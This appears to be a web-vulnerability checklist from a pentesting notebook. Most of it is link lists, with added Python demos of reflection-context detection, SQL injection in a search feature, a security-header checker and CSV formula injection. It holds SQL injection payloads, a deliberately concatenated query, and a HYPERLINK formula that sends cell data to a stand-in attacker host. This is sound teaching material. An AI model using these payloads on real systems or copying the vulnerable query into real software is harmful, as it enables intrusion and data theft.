# Web Vulnerabilities

## Proxies

* [ ] [**Server Side Inclusion**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/ssi.md)
* [ ] [**Cloudflare Bypass**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/cloudflare-bypass.md)
* [ ] [**XSLT Server Side Injection**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/xlst.md)

## **User input**

### **Reflected Values**

If user-supplied data is reflected anywhere in the response (HTML body, attribute, script block, header), the page may be vulnerable to several issues, depending on the context in which it lands.

* [ ] [**Client Side Template Injection**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/csti.md)
* [ ] [**Command Injection**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/command-injection.md)
* [ ] [**File Inclusion/Path Traversal**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/file-inclusion-path-traversal.md)

**TODO:**

* [ ] [**Prototype Pollution to XSS**](broken://pages/o4BNyaSE0gwoHQ1z0j7z#client-side-prototype-pollution-to-xss)
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](broken://pages/HPeX9XjuZC6HN2lZV9oH)
* [ ] [**Server Side Request Forgery**](broken://pages/lICZwfhTsRhF4nGDu8bG)
* [ ] [**Server Side Template Injection**](broken://pages/omuS5Y6Yba2O7Q2u2bNx)
* [ ] [**Reverse Tab Nabbing**](broken://pages/pstP6N5ikchspvqParNS)
* [ ] [**XSLT Server Side Injection**](broken://pages/RcnCdas4zyFSUF59Voen)
* [ ] [**XSS**](broken://pages/0Ag45nFpSS3g4hTEsFb1)
* [ ] [**XSSI**](broken://pages/Hk2cHPAhK1lY6o5a87a5)
* [ ] **XS-Search**

Some of the listed vulnerabilities require special conditions; others only need the input to be reflected. Some useful polyglots for testing them quickly can be found in:
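The first question for any reflected value is *where* it lands, because that decides which of the issues above applies. The following helper is an added example, not code from these notes: it sends nothing itself, but given a response body and the random marker you submitted, it reports the reflection contexts and whether angle brackets survived unencoded. The response body and canary below are constructed, and the context names are my own labels.

```python
import html
import re
import secrets
import string

# Added example (not from the original notes): classify where a reflected
# marker lands in an HTML response. Response bodies below are constructed
# strings; fetching the real response is left to the caller.

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def make_canary(length=10):
    """Random lowercase alphanumeric marker, unlikely to occur naturally in a page."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def reflection_contexts(body, canary):
    """Return the sorted list of contexts in which `canary` is reflected.

    html_text  : between tags, e.g. <p>CANARY</p>          -> XSS, CSTI, SSTI probes
    inside_tag : inside a tag, usually an attribute value  -> attribute breakout
    js_string  : inside a quoted string in <script>        -> quote breakout
    js_code    : in <script> outside any string            -> direct JS injection
    none       : not reflected at all
    """
    contexts = set()
    script_spans = [(m.start(1), m.end(1)) for m in SCRIPT_RE.finditer(body)]
    for m in re.finditer(re.escape(canary), body):
        pos, end = m.start(), m.end()
        if any(s <= pos < e for s, e in script_spans):
            before = body[pos - 1] if pos > 0 else ""
            after = body[end] if end < len(body) else ""
            quoted = bool(before) and before in "\"'`" and after == before
            contexts.add("js_string" if quoted else "js_code")
            continue
        # Outside <script>: an unclosed '<' before the marker means we are inside a tag.
        if body.rfind("<", 0, pos) > body.rfind(">", 0, pos):
            contexts.add("inside_tag")
        else:
            contexts.add("html_text")
    return sorted(contexts) or ["none"]


def angle_brackets_survive(body, canary):
    """Assuming the probe '<CANARY>' was sent, report whether the brackets came
    back raw (tags can be injected) or entity-encoded (output is escaped)."""
    probe = f"<{canary}>"
    return {"raw": probe in body, "encoded": html.escape(probe) in body}


# Constructed response; each line stands for a different sink of the same input.
SAMPLE_CANARY = "zq7h3kd9pa"
SAMPLE_BODY = (
    "<html><body>\n"
    f'<input type="text" name="q" value="{SAMPLE_CANARY}">\n'
    f"<p>You searched for: {SAMPLE_CANARY}</p>\n"
    f"<script>var q = '{SAMPLE_CANARY}'; track(q);</script>\n"
    f"<div>&lt;{SAMPLE_CANARY}&gt;</div>\n"
    "</body></html>"
)

if __name__ == "__main__":
    print(reflection_contexts(SAMPLE_BODY, SAMPLE_CANARY))
    print(angle_brackets_survive(SAMPLE_BODY, SAMPLE_CANARY))
```

Run it against a real target by requesting the page with `q=<canary>` and passing `response.text` in place of `SAMPLE_BODY`. A `js_string` hit with `angle_brackets_survive` reporting `encoded` is the typical case where HTML escaping is present but a `'` or `\` breakout still works, so check quote handling separately.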

### **Search functionalities**

If the functionality searches for data in the backend, the search term usually ends up inside a query (SQL, NoSQL, LDAP, XPath, a regular expression) or a file path, so it may be possible to (ab)use it to retrieve arbitrary data.

* [ ] [**File Inclusion/Path Traversal**](broken://pages/EsI9qe4WdfrC3Tkumqqk)
* [ ] [**NoSQL Injection**](broken://pages/ImqJx0euGifMIWVnDvGd)
* [ ] [**LDAP Injection**](broken://pages/okycio30oL9qOAkaCc9h)
* [ ] [**ReDoS**](broken://pages/jhXgAHMVg09RocMeFYFt)
* [ ] [**SQL Injection**](broken://pages/9NV1Y1ur3n93ekPMY7sn)
* [ ] [**XPATH Injection**](broken://pages/yGkodNJX5L5WRSZhPIlP)
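To make the point about search terms concrete, here is an added example (not from these notes) of a product search backed by SQLite, once with the term concatenated into the query and once parameterised. The schema, rows and payloads are constructed for the demo; the same shape applies to the NoSQL, LDAP and XPath cases listed above.

```python
import sqlite3

# Added example (not from the original notes): a product search that ends up in a
# SQL query, first with string concatenation, then parameterised. The database
# and its rows are constructed in memory for the demo.


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, released INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO products (name, released) VALUES (?, ?)",
        [("Gift Card", 1), ("Lamp", 1), ("Unreleased Widget", 0)],
    )
    conn.execute(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        ("admin", "hash-placeholder"),
    )
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """The search term is spliced into the query text, so a quote in it ends the
    string literal and everything after it is executed as SQL."""
    sql = f"SELECT name FROM products WHERE released = 1 AND name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """The term travels as a bound parameter; the query text never changes."""
    sql = "SELECT name FROM products WHERE released = 1 AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


# Classic probes: the first closes the string and disables the released=1 filter,
# the second appends a UNION that reads a different table through the same column.
PAYLOAD_BOOLEAN = "%' OR 1=1 --"
PAYLOAD_UNION = "' UNION SELECT username || ':' || password_hash FROM users --"

if __name__ == "__main__":
    db = build_db()
    print(search_vulnerable(db, "lamp"))            # normal search
    print(search_vulnerable(db, PAYLOAD_BOOLEAN))   # unreleased product leaks
    print(search_vulnerable(db, PAYLOAD_UNION))     # users table leaks
    print(search_safe(db, PAYLOAD_UNION))           # payload is just a literal
```

Two caveats worth keeping in mind when testing search features: `%` and `_` stay LIKE wildcards even when the term is bound (a bare `%` returns everything, which is data exposure, not injection, unless the query uses an `ESCAPE` clause), and parameters only cover values. Sort columns and table names that a search form passes as identifiers cannot be bound and are a common second injection point.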

### **Forms, WebSockets and PostMsgs**

When a form, a WebSocket or a `postMessage` handler lets a user perform actions, the request can often be triggered or read from another origin, which is where the following vulnerabilities arise.

* [ ] [**Cross Site Request Forgery**](broken://pages/0QtJI7erISFZa0SHyrDL)
* [ ] [**Cross-site WebSocket hijacking (CSWSH)**](broken://pages/kIOEFFyRlazQlS7gCf8A)
* [ ] [**PostMessage Vulnerabilities**](broken://pages/FREXVF3hJx580lncvIYK)

### **HTTP Headers**

Depending on the HTTP response headers the web server sets, or fails to set, some vulnerabilities might be present.

* [ ] [**Clickjacking**](broken://pages/K7ekgjjUzTSSJtiA14QE)
* [ ] [**Content Security Policy bypass**](broken://pages/BA0iZJf87AKejOnRtI3B)
* [ ] [**Cookies Hacking**](broken://pages/v0A3nNXNaN7G8hj7B0DL)
* [ ] [**CORS - Misconfigurations & Bypass**](broken://pages/lz3sV1sEkQfdA6RgzH0S)
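Because all four items above are decided by response headers, they can be triaged from a single captured response. The checker below is an added example, not code from these notes; it takes the response headers as a list of `(name, value)` pairs (so repeated `Set-Cookie` headers survive) plus the `Origin` you sent, and reports the weaknesses it recognises. The header sets and finding wording are constructed for the demo.

```python
# Added example (not from the original notes): triage clickjacking, CSP, CORS and
# cookie weaknesses from a response's headers. Sample header lists are constructed.


def parse_csp(value):
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    directives = {}
    for part in value.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def check_security_headers(headers, request_origin=None):
    """headers: iterable of (name, value) pairs from the response.
    request_origin: the Origin header that the test request carried, if any."""
    findings = []
    lower = [(name.lower(), value) for name, value in headers]
    first = {}
    for name, value in lower:
        first.setdefault(name, value)  # first occurrence wins for single-valued headers
    csp = parse_csp(first.get("content-security-policy", ""))

    # Clickjacking: framing is only restricted by X-Frame-Options or frame-ancestors.
    if "x-frame-options" not in first and "frame-ancestors" not in csp:
        findings.append("clickjacking: no X-Frame-Options and no CSP frame-ancestors")

    # CSP: the script sources decide whether a reflected value becomes XSS.
    if not csp:
        findings.append("csp: Content-Security-Policy missing")
    else:
        script_src = csp.get("script-src", csp.get("default-src", []))
        has_nonce_or_hash = any(
            s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script_src
        )
        # Browsers ignore 'unsafe-inline' when a nonce or hash is present, so only
        # flag it when it is actually effective.
        if "'unsafe-inline'" in script_src and not has_nonce_or_hash:
            findings.append("csp: script-src allows 'unsafe-inline' with no nonce/hash")
        if "'unsafe-eval'" in script_src:
            findings.append("csp: script-src allows 'unsafe-eval'")
        for s in script_src:
            if s in ("*", "https:", "http:", "data:"):
                findings.append(f"csp: script-src allows over-broad source {s}")

    # CORS: an arbitrary (reflected) or null origin combined with credentials lets a
    # cross-site page read authenticated responses. '*' with credentials is rejected
    # by browsers, so it is not flagged here.
    acao = first.get("access-control-allow-origin")
    creds = first.get("access-control-allow-credentials", "").lower() == "true"
    if acao and creds and (acao == "null" or (request_origin and acao == request_origin)):
        findings.append(f"cors: origin {acao} allowed with credentials")

    # Cookies: every Set-Cookie is checked on its own.
    for name, value in lower:
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        attrs = {a.strip().split("=", 1)[0].lower() for a in value.split(";")[1:]}
        missing = [flag for flag in ("secure", "httponly", "samesite") if flag not in attrs]
        if missing:
            findings.append(f"cookie {cookie_name}: missing {', '.join(missing)}")
    return findings


# Constructed responses: a weak one and a hardened one for the same application.
SAMPLE_WEAK = [
    ("Content-Type", "text/html"),
    ("Content-Security-Policy", "default-src 'self'; script-src 'self' 'unsafe-inline' https:"),
    ("Access-Control-Allow-Origin", "https://evil.example"),
    ("Access-Control-Allow-Credentials", "true"),
    ("Set-Cookie", "session=abc123; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/; Secure"),
]
SAMPLE_HARDENED = [
    ("Content-Security-Policy",
     "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; frame-ancestors 'none'"),
    ("Access-Control-Allow-Origin", "https://app.example"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for f in check_security_headers(SAMPLE_WEAK, request_origin="https://evil.example"):
        print(f)
    print(check_security_headers(SAMPLE_HARDENED, request_origin="https://evil.example"))
```

For the CORS check to mean anything, send the request twice with different `Origin` values (an arbitrary origin and `null`); a server that echoes whatever it receives shows up as the reflected case above, while one with a fixed allow-list does not.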

### **Bypasses**

Several specific functionalities (authentication steps, payments, rate limits) have known workarounds that may bypass the control they implement.

* [ ] [**2FA/OTP Bypass**](broken://pages/JGGYtGz3b0HkPkp8bjVk)
* [ ] [**Bypass Payment Process**](broken://pages/nFHRyuQC8p8w9S28YzqF)
* [ ] [**Captcha Bypass**](broken://pages/ozZi4eRTM359pO4uGzE5)
* [ ] [**Login Bypass**](broken://pages/taZDHiWzgam2DbuLWmBc)
* [ ] [**Race Condition**](broken://pages/jR2aeBAJV9Y9zbDTtMFI)
* [ ] [**Rate Limit Bypass**](broken://pages/XlIjPYzFL6yVjj2jPD4z)
* [ ] [**Reset Forgotten Password Bypass**](broken://pages/E565s6uHUrZ6zN8XLMAw)
* [ ] [**Registration Vulnerabilities**](broken://pages/f3xwYYpVW8i3GBAxEEMl)

### **Structured objects / Specific functionalities**

Some functionalities require the **data to be structured in a very specific format** (a language-specific serialized object, XML, a signed token). This makes the candidate vulnerability easier to identify, since the application must be parsing that kind of data.\
Other **specific functionalities** may be vulnerable only if a **specific format of the input is used** (like Email Header Injection).

* [ ] [**Deserialization**](broken://pages/8JFreTu76LKxP4bLhJjM)
* [ ] [**Email Header Injection**](broken://pages/U21miJ3UPoJUJCq8AorQ)
* [ ] [**JWT Vulnerabilities**](broken://pages/wOdVltrFe2X0dbQfjL8v)
* [ ] [**XML External Entity**](broken://pages/buOZY5e7mYvyGPeuVbD5)

### Files

Functionalities that allow uploading files might be vulnerable to several issues.\
Functionalities that generate files (CSV, PDF, HTML reports) from user input may embed that input where the consuming application interprets it as code or formulas.\
Users who open files uploaded by other users, or files generated from other users' input, might be compromised.

* [ ] [**File Upload**](broken://pages/XGlt8CYJ3LTDGb2EdEHn)
* [ ] [**Formula Injection**](broken://pages/yUOI6QC70UjnGHXXA7BQ)
* [ ] [**PDF Injection**](broken://pages/M7kBvg4UcIXO15gZ2uTU)
* [ ] [**Server Side XSS**](broken://pages/gA14tB5uNu1AZSXdrPex)
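The "generated file" case above is easy to reproduce with a CSV export. The following is an added example, not code from these notes: it writes the same constructed rows twice, once as-is and once with formula-looking cells neutralised the way spreadsheet software expects, so a cell that starts with `=`, `+`, `-` or `@` is stored as text instead of being evaluated when the file is opened.

```python
import csv
import io

# Added example (not from the original notes): CSV export of user-controlled
# values, first as-is and then with formula-looking cells neutralised. Rows are
# constructed for the demo.

# Leading characters that make spreadsheet software evaluate a cell as a formula.
# Tab and carriage return are included because they are commonly cited as
# surviving the import step and preceding one of the other triggers.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell):
    return isinstance(cell, str) and cell.startswith(FORMULA_TRIGGERS)


def neutralize_cell(cell):
    """Prefix a suspicious cell with a single quote; spreadsheets then keep it as
    text. csv.writer takes care of quoting commas and doubling embedded quotes."""
    return "'" + cell if is_formula_like(cell) else cell


def export_vulnerable(rows):
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()


def export_safe(rows):
    buf = io.StringIO()
    csv.writer(buf).writerows([[neutralize_cell(c) for c in row] for row in rows])
    return buf.getvalue()


def parse_csv(text):
    """Read an export back the way a consumer would, for inspection."""
    return list(csv.reader(io.StringIO(text)))


# Constructed user records; the display_name column is attacker-controlled.
SAMPLE_ROWS = [
    ["id", "display_name", "note"],
    [1, "alice", "regular user"],
    [2, '=HYPERLINK("https://attacker.example/?x="&B1,"open")', "formula set via profile form"],
    [3, "-1+1", "looks numeric but is evaluated as a formula"],
    [4, "O'Brien", "apostrophe not at the start is left alone"],
]

if __name__ == "__main__":
    print(export_vulnerable(SAMPLE_ROWS))
    print(export_safe(SAMPLE_ROWS))
```

The quote prefix also mangles legitimate values such as negative numbers or phone numbers written with a leading `+`, so apply it only to free-text columns and emit numeric columns as numbers. Note that the `HYPERLINK` payload above exfiltrates the neighbouring cell when clicked even though it contains no macro; the `-1+1` row shows why a numeric-looking check is not enough.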

### **External Identity Management**

* [ ] [**OAUTH to Account takeover**](broken://pages/OEny1HLXi5G4yDefaowY)
* [ ] [**SAML Attacks**](broken://pages/gJyG40ydT12tSIBplM7B)

### **Other Helpful Vulnerabilities**

These vulnerabilities are often of limited impact on their own but help to exploit or escalate other vulnerabilities.

* [ ] [**Domain/Subdomain takeover**](broken://pages/OHn7qzOAxodoIZwAhMW3)
* [ ] [**IDOR**](broken://pages/9CIQ4fOFj9oK7fZ9HYfe)
* [ ] [**Parameter Pollution**](broken://pages/BrSr5l1XDDVekHwJXVYs)
* [ ] [**Unicode Normalization vulnerability**](broken://pages/k41i4cI4KI3W7JZz9VSk)


